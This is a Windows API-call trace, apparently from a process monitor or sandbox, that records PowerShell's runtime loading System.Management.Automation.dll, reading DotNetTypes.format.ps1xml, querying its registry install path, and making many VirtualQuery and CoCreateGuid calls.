	[0348.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.613] VirtualQuery (in: lpAddress=0xcbba0, lpBuffer=0xcca60, dwLength=0x30 | out: lpBuffer=0xcca60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.614] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x8a9a7bb5, Data2=0xbdea, Data3=0x4367, Data4=([0]=0x8c, [1]=0xf1, [2]=0xb7, [3]=0xce, [4]=0xdb, [5]=0xa0, [6]=0x33, [7]=0x4b))) returned 0x0
	[0348.614] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xf47b7f52, Data2=0x63ab, Data3=0x4909, Data4=([0]=0x87, [1]=0xd1, [2]=0x8d, [3]=0x30, [4]=0x97, [5]=0x1e, [6]=0xc7, [7]=0x38))) returned 0x0
	[0348.614] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.615] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.615] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x3da0e046, Data2=0xb853, Data3=0x4216, Data4=([0]=0xb5, [1]=0x72, [2]=0x98, [3]=0xd1, [4]=0xbc, [5]=0xe0, [6]=0x4f, [7]=0x64))) returned 0x0
	[0348.615] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x6abc2dbc, Data2=0xde3, Data3=0x4093, Data4=([0]=0xb6, [1]=0xf4, [2]=0x5b, [3]=0xb2, [4]=0x85, [5]=0xda, [6]=0x54, [7]=0x7e))) returned 0x0
	[0348.615] VirtualQuery (in: lpAddress=0xcbfa0, lpBuffer=0xcce60, dwLength=0x30 | out: lpBuffer=0xcce60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.616] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.616] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.616] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x80aa3668, Data2=0x2fbe, Data3=0x40e2, Data4=([0]=0xa5, [1]=0xfc, [2]=0xf3, [3]=0xe, [4]=0xbc, [5]=0x19, [6]=0xa6, [7]=0x9c))) returned 0x0
	[0348.616] VirtualQuery (in: lpAddress=0xcbfa0, lpBuffer=0xcce60, dwLength=0x30 | out: lpBuffer=0xcce60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.616] VirtualQuery (in: lpAddress=0xcbdc0, lpBuffer=0xccc80, dwLength=0x30 | out: lpBuffer=0xccc80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.617] VirtualQuery (in: lpAddress=0xcb610, lpBuffer=0xcc4d0, dwLength=0x30 | out: lpBuffer=0xcc4d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.617] VirtualQuery (in: lpAddress=0xcb610, lpBuffer=0xcc4d0, dwLength=0x30 | out: lpBuffer=0xcc4d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.617] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x34d53bcf, Data2=0xc68f, Data3=0x45b0, Data4=([0]=0x9d, [1]=0x22, [2]=0x85, [3]=0xcf, [4]=0xb6, [5]=0x89, [6]=0xb6, [7]=0xb8))) returned 0x0
	[0348.617] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x1a9397ff, Data2=0x30f6, Data3=0x48e1, Data4=([0]=0x8e, [1]=0x3, [2]=0x9b, [3]=0x5, [4]=0xb, [5]=0xb1, [6]=0x4b, [7]=0xc3))) returned 0x0
	[0348.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0348.618] SetErrorMode (uMode=0x1) returned 0x1
	[0348.618] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0348.618] GetFileType (hFile=0x304) returned 0x1
	[0348.618] SetErrorMode (uMode=0x1) returned 0x1
	[0348.618] GetFileType (hFile=0x304) returned 0x1
	[0348.618] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0348.619] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0348.620] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0348.620] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0348.620] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0348.621] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0348.621] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0348.621] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0348.622] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0348.622] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0348.622] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0348.622] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0348.623] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0348.623] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0348.623] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0348.623] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0348.625] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0348.625] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0xbce, lpOverlapped=0x0) returned 1
	[0348.625] ReadFile (in: hFile=0x304, lpBuffer=0x330a6ce, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330a6ce*, lpNumberOfBytesRead=0xcd078*=0x0, lpOverlapped=0x0) returned 1
	[0348.625] ReadFile (in: hFile=0x304, lpBuffer=0x330af98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x330af98*, lpNumberOfBytesRead=0xcd078*=0x0, lpOverlapped=0x0) returned 1
	[0348.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0348.625] SetErrorMode (uMode=0x1) returned 0x1
	[0348.625] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd020 | out: lpFileInformation=0xcd020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0348.626] SetErrorMode (uMode=0x1) returned 0x1
	[0348.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0348.626] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd108 | out: phkResult=0xcd108*=0x304) returned 0x0
	[0348.626] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd08c, lpData=0x0, lpcbData=0xcd088*=0x0 | out: lpType=0xcd08c*=0x1, lpData=0x0, lpcbData=0xcd088*=0x56) returned 0x0
	[0348.626] CoTaskMemAlloc (cb=0x5a) returned 0x3592d0
	[0348.626] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd05c, lpData=0x3592d0, lpcbData=0xcd058*=0x56 | out: lpType=0xcd05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd058*=0x56) returned 0x0
	[0348.626] CoTaskMemFree (pv=0x3592d0) 
	[0348.626] RegCloseKey (hKey=0x304) returned 0x0
	[0348.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0348.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0349.077] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xcbfd1df, Data2=0x2d3, Data3=0x4cd2, Data4=([0]=0x87, [1]=0x76, [2]=0x13, [3]=0x5a, [4]=0x14, [5]=0x86, [6]=0xf2, [7]=0xa2))) returned 0x0
	[0349.078] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xd617d046, Data2=0xc50c, Data3=0x4131, Data4=([0]=0xa3, [1]=0x8b, [2]=0xe8, [3]=0xb6, [4]=0xef, [5]=0xfc, [6]=0xe0, [7]=0xf7))) returned 0x0
	[0349.079] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x8c6f0394, Data2=0xf1f4, Data3=0x4efe, Data4=([0]=0xb9, [1]=0x1c, [2]=0x73, [3]=0xc2, [4]=0x7a, [5]=0xb6, [6]=0x7e, [7]=0x1))) returned 0x0
	[0349.079] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x5b8c7a99, Data2=0x7410, Data3=0x43b8, Data4=([0]=0x98, [1]=0x8b, [2]=0x3f, [3]=0x8b, [4]=0x7e, [5]=0xce, [6]=0x8b, [7]=0x66))) returned 0x0
	[0349.080] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x8cde626b, Data2=0xfbbb, Data3=0x49d7, Data4=([0]=0xb0, [1]=0xd8, [2]=0x2e, [3]=0xc9, [4]=0xd4, [5]=0xa3, [6]=0x66, [7]=0x58))) returned 0x0
	[0349.080] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xdd413033, Data2=0x5532, Data3=0x4967, Data4=([0]=0xaa, [1]=0x23, [2]=0xf9, [3]=0xb8, [4]=0xcf, [5]=0xe, [6]=0xe9, [7]=0xe3))) returned 0x0
	[0349.081] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.082] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x85d372e3, Data2=0x20f8, Data3=0x4341, Data4=([0]=0x82, [1]=0x3b, [2]=0xc1, [3]=0x5, [4]=0x8, [5]=0x80, [6]=0xb8, [7]=0xab))) returned 0x0
	[0349.082] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.083] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.085] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x4c178c32, Data2=0x84e7, Data3=0x400b, Data4=([0]=0xa3, [1]=0xec, [2]=0x76, [3]=0x55, [4]=0x51, [5]=0x31, [6]=0x4, [7]=0x44))) returned 0x0
	[0349.085] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xc97f8d0b, Data2=0x4f00, Data3=0x49eb, Data4=([0]=0xa9, [1]=0x3f, [2]=0x1c, [3]=0xc0, [4]=0x39, [5]=0xdc, [6]=0xa0, [7]=0x90))) returned 0x0
	[0349.085] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xcccc70c3, Data2=0xae50, Data3=0x4ffb, Data4=([0]=0xba, [1]=0x8f, [2]=0x48, [3]=0x4e, [4]=0xa2, [5]=0x74, [6]=0x92, [7]=0x37))) returned 0x0
	[0349.085] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xa25e41b1, Data2=0xa93, Data3=0x4e79, Data4=([0]=0x96, [1]=0xc6, [2]=0x20, [3]=0x36, [4]=0x14, [5]=0xa3, [6]=0xf8, [7]=0xb9))) returned 0x0
	[0349.085] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.085] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x1db3722c, Data2=0xedb9, Data3=0x4d2c, Data4=([0]=0x82, [1]=0x58, [2]=0xa2, [3]=0x16, [4]=0x75, [5]=0x1f, [6]=0x94, [7]=0xf9))) returned 0x0
	[0349.085] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.086] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.086] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.086] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.086] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.087] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x750affe4, Data2=0x34b5, Data3=0x4d06, Data4=([0]=0x9e, [1]=0xe5, [2]=0x58, [3]=0x77, [4]=0xc2, [5]=0x3e, [6]=0x3f, [7]=0x1c))) returned 0x0
	[0349.087] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xf90c9ef8, Data2=0x7b0d, Data3=0x4355, Data4=([0]=0xbd, [1]=0x6a, [2]=0x5a, [3]=0x1a, [4]=0x39, [5]=0x82, [6]=0xad, [7]=0xe7))) returned 0x0
	[0349.087] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x821e5d22, Data2=0x2dd1, Data3=0x46cd, Data4=([0]=0xa1, [1]=0x62, [2]=0x8a, [3]=0xcf, [4]=0xab, [5]=0x1e, [6]=0xad, [7]=0xec))) returned 0x0
	[0349.087] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xa326279f, Data2=0x564e, Data3=0x4bf8, Data4=([0]=0x88, [1]=0x4b, [2]=0xb0, [3]=0xe8, [4]=0x58, [5]=0x78, [6]=0xf2, [7]=0xbc))) returned 0x0
	[0349.087] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xea0cf7c4, Data2=0x5740, Data3=0x4afa, Data4=([0]=0x90, [1]=0xa3, [2]=0xa7, [3]=0xf2, [4]=0x24, [5]=0x52, [6]=0xe5, [7]=0x22))) returned 0x0
	[0349.087] VirtualQuery (in: lpAddress=0xcbfa0, lpBuffer=0xcce60, dwLength=0x30 | out: lpBuffer=0xcce60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.087] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x8d73e15d, Data2=0x33bb, Data3=0x4139, Data4=([0]=0xac, [1]=0x91, [2]=0xdc, [3]=0xa5, [4]=0xe4, [5]=0xb5, [6]=0x7d, [7]=0xa4))) returned 0x0
	[0349.088] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xdbd40e5b, Data2=0x7ab9, Data3=0x4848, Data4=([0]=0x8e, [1]=0x5, [2]=0xca, [3]=0xd4, [4]=0x35, [5]=0x3, [6]=0x98, [7]=0xef))) returned 0x0
	[0349.088] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xa14f89b8, Data2=0x2299, Data3=0x48ef, Data4=([0]=0x94, [1]=0xc, [2]=0xd8, [3]=0x2e, [4]=0xbc, [5]=0xcd, [6]=0xd, [7]=0x9))) returned 0x0
	[0349.088] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xcf15be4f, Data2=0xb578, Data3=0x4bdd, Data4=([0]=0xb8, [1]=0x9, [2]=0xb9, [3]=0xcb, [4]=0x48, [5]=0x7a, [6]=0x51, [7]=0x8d))) returned 0x0
	[0349.088] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xcb6a0555, Data2=0x3fbe, Data3=0x4ebf, Data4=([0]=0x99, [1]=0xab, [2]=0xec, [3]=0x8, [4]=0xb2, [5]=0x66, [6]=0x12, [7]=0xe))) returned 0x0
	[0349.088] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x424b1de6, Data2=0xb4eb, Data3=0x43ac, Data4=([0]=0xaa, [1]=0xb6, [2]=0x59, [3]=0x2f, [4]=0xa4, [5]=0xf6, [6]=0x21, [7]=0xae))) returned 0x0
	[0349.088] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x9b463ab3, Data2=0x8214, Data3=0x481b, Data4=([0]=0x8e, [1]=0x8f, [2]=0xfd, [3]=0xe9, [4]=0xa, [5]=0xa4, [6]=0xfa, [7]=0xa))) returned 0x0
	[0349.088] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x5ec50c29, Data2=0xc181, Data3=0x4b11, Data4=([0]=0x94, [1]=0x91, [2]=0x4, [3]=0xe6, [4]=0x66, [5]=0x56, [6]=0x80, [7]=0x58))) returned 0x0
	[0349.089] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xedf0ba17, Data2=0x65f2, Data3=0x4cdf, Data4=([0]=0x99, [1]=0x8c, [2]=0x8e, [3]=0xbb, [4]=0xc6, [5]=0x3a, [6]=0x3b, [7]=0xfe))) returned 0x0
	[0349.089] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x4b28b0f1, Data2=0xfc94, Data3=0x4e6d, Data4=([0]=0xbd, [1]=0x3a, [2]=0x2a, [3]=0x89, [4]=0x52, [5]=0x30, [6]=0x49, [7]=0x14))) returned 0x0
	[0349.089] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x2d5b90b4, Data2=0x94aa, Data3=0x4548, Data4=([0]=0xa5, [1]=0xd5, [2]=0x2b, [3]=0x1e, [4]=0xd5, [5]=0x8d, [6]=0x4f, [7]=0x1))) returned 0x0
